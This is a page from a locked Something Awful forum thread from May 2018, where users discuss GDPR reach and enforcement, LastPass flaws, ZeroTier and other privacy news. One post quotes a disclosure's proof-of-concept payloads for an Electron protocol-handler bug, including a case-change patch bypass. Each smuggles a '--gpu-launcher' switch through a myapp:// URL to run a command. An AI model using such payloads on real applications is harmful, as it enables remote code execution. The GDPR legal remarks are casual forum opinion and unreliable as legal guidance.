Register a SA Forums Account here!
JOINING THE SA FORUMS WILL REMOVE THIS BIG AD, THE ANNOYING UNDERLINED ADS, AND STUPID INTERSTITIAL ADS!!!

You can: log in, read the tech support FAQ, or request your lost password. This dumb message (and those ads) will appear on every screen until you register! Get rid of this crap by registering your own SA Forums Account and joining roughly 150,000 Goons, for the one-time price of $9.95! We charge money because it costs us money per month for bills, and since we don't believe in showing ads to our users, we try to make the money back through forum registrations.

• Locked thread
ate shit on live tv
Feb 15, 2004

by Azathoth

Volmarias posted:

Please tell me this is actually true and not a joke

I got that from Wikipedia, unsourced, but reading some of the other sourced claims it seems likely, true. Especially in conjunction with the stated ability for people to withdraw consent at anytime and be informed specifically about what kind of information will be collected and what legal basis the company has to collect it.

Adbot
ADBOT LOVES YOU

anthonypants
May 6, 2007

by Nyc_Tattoo
Dinosaur Gum
i couldn't think of any of those places i'd call that would be affected by gdpr, but then i remembered that a lot of callcenters are overseas

Raere
Dec 13, 2007

they can start by not saying “this call may be recorded” when it obviously is

Media Bloodbath
Mar 1, 2018

PIVOT TO ETERNAL SUFFERING
:hb:

anthonypants posted:

i couldn't think of any of those places i'd call that would be affected by gdpr, but then i remembered that a lot of callcenters are overseas

Doesn't matter if you're an EU citizen.

sadus
Apr 5, 2004

ate poo poo on live tv posted:

I did not consent to this communication, and according to the GDPR article 69, section 420 signed by president Bill Clinton, you must delete this message within 24 hours or you will be hearing from my attorney.

Wiggly Wayne DDS
Sep 11, 2010

BangersInMyKnickers posted:

Has anyone cataloged LastPass's fuckups with their browser plugin in a single thing? The CVE sites only have a single DoS issue listed from last year and I know there was at least a half dozen trivial fuckups on their part that allowed disclosure of the decrypted store. We're in the process of implementing an internal credential management platform but it isn't ready yet and we need to steer people towards something else to bridge the gap. If I don't have good ammo against LastPass they're going to go there instead of 1Password. Hell, I'd rather them sync a shared OneDrive with a KeepAss db.
i've yelled in the gray thread about it, phoneposting but you should be able to stitch something together off of that

Wheany
Mar 17, 2006

Spinyahahahahahahahahahahahaha!

Doctor Rope
https://twitter.com/twheany/status/999878959641673729

evil_bunnY
Apr 2, 2003

https://blog.doyensec.com/2018/05/24/electron-win-protocol-handler-bug-bypass.html

So about that electron RCE...

Wheany
Mar 17, 2006

Doctor Rope
https://twitter.com/GusHosein/status/999891211400851456

:getin:

Powerful Two-Hander
Mar 10, 2004

Mods please change my name to "Tooter Skeleton" TIA.

lmao

also viewing this prompted a twitter app privacy refresh where I gleefully deselected every single think. Good luck trying to monetise my one single tweet now shitlords !

spankmeister
Jun 15, 2008

Incognito mode still works on wapo so...

Wheany
Mar 17, 2006

Doctor Rope
https://twitter.com/helveticade/status/999953762151272450?s=19

mrmcd
Feb 22, 2003

Pictured: The only good cop (a fictional one).

Tumblr is part of Oath, the frankenzombie of several pants on head retarded corpses that include AOL, Yahoo, all reanimated by the dark necro heart of Verizon.

What I'm saying is it's probably 50/50 malevolence vs. incompetence.

Proteus Jones
Feb 28, 2013

HAHAHAHAHAHAHAHAHA
*breathe*
HAHAHAHAHAHAHAHAHA

https://arstechnica.com/gadgets/2018/05/amazon-confirms-that-echo-device-secretly-shared-users-private-audio/

Shifty Pony
Dec 28, 2004

Up ta somethin'

Media Bloodbath posted:

Doesn't matter if you're an EU citizen.

that's the best drat part of gpdr. my understanding is that even those "block the entire EU IP space" things won't make you compliant because an EU citizen could access your service while vacationing.

EssOEss
Oct 23, 2006
128-bit approved
How exactly does that work? EU laws apply to the EU. If I am not a legal entity in the EU, I find it hard to imagine why I should care. Where's the catch?

Jewel
May 2, 2009

reminds me of someone on reddit saying they said their company was bad in the "anonymous" survey and got called up for it

https://twitter.com/makingthemarrow/status/999665147881893888

evil_bunnY
Apr 2, 2003

EssOEss posted:

How exactly does that work? EU laws apply to the EU. If I am not a legal entity in the EU, I find it hard to imagine why I should care. Where's the catch?
If you service EU citizens, you gotta be compliant. If you're not an EU entity you can still be found non-compliant and fined, tho enforcement might be problematic.

Mad Wack
Mar 27, 2008

"The faster you use your cooldowns, the faster you can use them again"
https://twitter.com/dasharez0ne/sta...genumber%3D2329

Shifty Pony
Dec 28, 2004

Up ta somethin'

EssOEss posted:

again, if I'm remembering right, in practice if you never have any interest in expanding to the EU it is mostly a curiosity because they don't really have a way to punish you for not complying, but it is worth considering if there is the slightest chance you might want to do business in the EU in the future.

this could all be bullshit though because there is so much conflicting stuff out there about what gdpr actually means and will continue to be until they start getting a good set of legal precedent built up.

Chalks
Sep 30, 2009

Also if you don't do any business in the EU but you provide services to companies who do, they'll need you to be compliant if you go anywhere near their data.

Chalks fucked around with this message at 13:12 on May 25, 2018

Jabor
Jul 16, 2010

#1 Loser at SpaceChem
This applies even if it's, e.g. your consumer department that's running a non-compliant website, while your totally different b2b department is selling services to companies that do business in the EU.

I'm sure some companies are going to try doing some creative restructuring to try and dodge that, but I'm not sure how effective that's going to be.

Diva Cupcake
Aug 15, 2005

burn it all down.

https://twitter.com/BBCNews/status/999961629847621632

https://twitter.com/cnnbrk/status/999986936084418561

geonetix
Mar 6, 2011

evil_bunnY posted:

If you service EU citizens, you gotta be compliant. If you're not an EU entity you can still be found non-compliant and fined, tho enforcement might be problematic.

good luck pointing this out to the hotel in chili that nobody knows about as an EU citizen.

it’s mostly tied to companies who have representation in the EU and/or signed any form of data processing agreement. technically it could apply to boutique shops but they’ll large remain out of flak even if only the DPAs in Europe simply have bigger fish to fry

unless your boutique shop does Cambridge Analytica kinda things of course

Wiggly Wayne DDS
Sep 11, 2010

72 hours remain

BangersInMyKnickers
Nov 3, 2004

I have a thing for courageous dongles

I dug in to that ZeroTier thing more and the best I can tell is some kind of Tor/VPN hybrid when, by running the client, you become a relay node for other networks' traffic in addition terminating stuff destined for you. The traffic of other people is encrypted with their (apparently static?) AES256 key so you shouldn't be able to read it, in theory, assuming they didn't gently caress their implementation. But also if you have a fat, fast pipe you end up relaying a bunch of traffic for other people using the loving thing. This was a very smart thing for one of our infrastructure guys to run inside our critical network segments.

Schadenboner
Aug 15, 2011

by Shine

have a fat, fast pipe

Txt me.

Shaggar
Apr 26, 2006

EssOEss posted:

as long as you don't have any assets in the EU you're fine.

Volmarias
Dec 31, 2002

EMAIL... THE INTERNET... SEARCH ENGINES...

geonetix posted:

the hotel in chili

The Hotel Delicious? I think I've been there, it was ok.

Schadenboner
Aug 15, 2011

by Shine

Volmarias posted:

The Hotel Delicious? I think I've been there, it was ok.

With or without beans?

Volmarias
Dec 31, 2002

EMAIL... THE INTERNET... SEARCH ENGINES...

Schadenboner posted:

With or without beans?

There apparently used to be beans, but weren't any when I was there. I don't know if that was permanent or temporary or what but I was only staying for a day so it wasn't a big deal.

Xarn
Jun 26, 2015

IThis was a very smart thing for one of our infrastructure guys to run inside our critical network segments.

Could've been buttcoins.

geonetix
Mar 6, 2011

Volmarias posted:

There apparently used to be beans, but weren't any when I was there. I don't know if that was permanent or temporary or what but I was only staying for a day so it wasn't a big deal.

everytime i go there i spent way too much time in the restrooms after

VileLL
Oct 3, 2015

congrats to my company on deciding that complete internet browsing records, tied to usernames that are pretty much always a person's full name, aren't classed as 'personal data'

Truga
May 4, 2014
Lipstick Apathy
ah, another facebook and/or employee in the thread, nice

big shtick energy
May 27, 2004

it’s missing the raiders of the lost ark music

Shaggar
Apr 26, 2006

im the settings menu accidentally brought up by bad UX

anthonypants
May 6, 2007

by Nyc_Tattoo
Dinosaur Gum

quote:

The original issue was extensively discussed in many blog posts, and can be summarized as the ability to use custom protocol handlers (e.g. myapp://) from a remote web page to piggyback command line arguments and insert a new switch that Electron/Chromium/Node would recognize and execute while launching the application.
code:
<script>
win.location = 'myapp://foobar" --gpu-launcher="cmd c/ start calc" --foobar='
</script>
Interestingly, on January 31, 2018, Electron v1.7.12, v1.6.17 and v1.8.2-beta5 were released. It turned out that the initial patch did not take into account uppercase characters and led to a bypass in the previous patch with:
code:
<script>
win.location = 'myapp://foobar" --GPU-launcher="cmd c/ start calc" --foobar='
</script>

Carthag Tuek
Oct 15, 2005

Tider skal komme,
tider skal henrulle,
slægt skal følge slægters gang

VileLL posted:

congrats to my company on deciding that complete internet browsing records, tied to usernames that are pretty much always a person's full name, aren't classed as 'personal data'

whistleblowing time imo :getin:

Adbot
ADBOT LOVES YOU

Shame Boy
Mar 2, 2010

Krankenstyle posted:

whistleblowing time imo :getin:

:toot:

• Locked thread